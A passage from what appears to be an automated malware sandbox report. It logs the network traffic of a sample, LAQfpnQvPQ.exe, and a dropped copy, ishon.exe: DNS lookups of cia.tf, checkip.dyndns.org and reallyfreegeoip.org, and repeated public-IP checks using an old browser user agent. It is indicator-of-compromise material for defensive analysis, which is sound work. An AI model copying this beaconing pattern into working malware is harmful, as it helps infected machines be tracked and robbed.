                                                                        Nov 25, 2024 15:00:12.271809101 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.271866083 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752104998 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752185106 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752244949 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.758013964 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.986778021 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:12.988456011 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.108549118 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:13.108644962 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.108895063 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.121397972 CET8049830193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:13.121510983 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.228818893 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:18.952763081 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:18.954926968 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.954991102 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:18.955099106 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.955476046 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.955497026 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:18.995989084 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.260253906 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.262305021 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.262326956 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747086048 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747153044 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747288942 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.748012066 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.752882004 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.754118919 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.873219967 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:20.873280048 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.874305964 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:20.874392986 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.874562979 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.994585991 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:26.039747000 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:26.044745922 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.044792891 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:26.044929981 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.045206070 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.045218945 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:26.089657068 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:27.260468960 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.262775898 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:27.262794018 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891269922 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891346931 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891413927 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:27.891952038 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:46.562621117 CET8049772193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:46.562680006 CET4977280192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:01:04.450347900 CET8049821193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:01:04.451270103 CET4982180192.168.2.5193.122.130.0

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 25, 2024 14:59:01.827379942 CET5177253192.168.2.51.1.1.1
                                                                        Nov 25, 2024 14:59:02.078649998 CET53517721.1.1.1192.168.2.5
                                                                        Nov 25, 2024 14:59:18.751571894 CET5684853192.168.2.51.1.1.1
                                                                        Nov 25, 2024 14:59:18.890959024 CET53568481.1.1.1192.168.2.5
                                                                        Nov 25, 2024 14:59:20.634512901 CET4927853192.168.2.51.1.1.1
                                                                        Nov 25, 2024 14:59:20.978183985 CET53492781.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 25, 2024 14:59:01.827379942 CET192.168.2.51.1.1.10x461aStandard query (0)cia.tfA (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.751571894 CET192.168.2.51.1.1.10xc8dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:20.634512901 CET192.168.2.51.1.1.10xfd7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 25, 2024 14:59:02.078649998 CET1.1.1.1192.168.2.50x461aNo error (0)cia.tf104.21.1.182A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:02.078649998 CET1.1.1.1192.168.2.50x461aNo error (0)cia.tf172.67.129.178A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:18.890959024 CET1.1.1.1192.168.2.50xc8dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:20.978183985 CET1.1.1.1192.168.2.50xfd7No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                        Nov 25, 2024 14:59:20.978183985 CET1.1.1.1192.168.2.50xfd7No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • cia.tf
                                                                        • reallyfreegeoip.org
                                                                        • checkip.dyndns.org

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549712193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:19.019103050 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:20.206801891 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:20 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 71e2d40b384f584618c52b9b9643d249
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:20.210952997 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:20.549824953 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:20 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4b22910e5d2cf2343d81dc66ed893580
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:23.048497915 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:23.387872934 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 68bc8a9acd175f36aa45c2016554eea8
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549727193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:25.183823109 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:26.279597044 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a3eabf0d3eb7ce2658f036a273032724
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549738193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:28.134361982 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:29.337124109 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d0da23e1583569f8e81a277688c67448
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549745193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:31.244891882 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:32.462486029 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4b8f52ba9e2fc0534638c1e523bfc8e7
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549754193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:34.325927019 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:35.468415976 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:35 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e9cf38e5eda87e89198d4b84392cb582
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549765193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:37.409106970 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:38.515835047 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:38 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b342b26ed45220479154b99d4b7421d1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549772193.122.130.0806364C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:40.418848991 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:41.562829018 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:41 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 9a15adba706746d8ae784f4172d14bf4
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549789193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:46.339698076 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:47.527693987 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b5820ae2fe11c33cde7c2846c1da450a
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:47.531701088 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:48.085726976 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a53f9ccb97072adc5eb0212ca5f3cddd
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                        Nov 25, 2024 14:59:49.929599047 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:50.267688036 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 3238a7672559bfd61fb7f5dc22197b5c
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549802193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:52.220335960 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:53.414978027 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 119d5c0632d59ff1a09da8c80457a625
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549814193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:55.259605885 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:56.462474108 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d8e249d39c251a99567965ca3331cf83
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549821193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 14:59:58.253139019 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Nov 25, 2024 14:59:59.450124979 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d27b6a49147d9f909c42d6e204968b26
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549830193.122.130.0806184C:\Users\user\AppData\Roaming\ishon.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 25, 2024 15:00:01.360769033 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 15:00:10.898750067 CET320INHTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 14:00:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d7a4dc99a0fe018ecc3d2aa1d8039d88
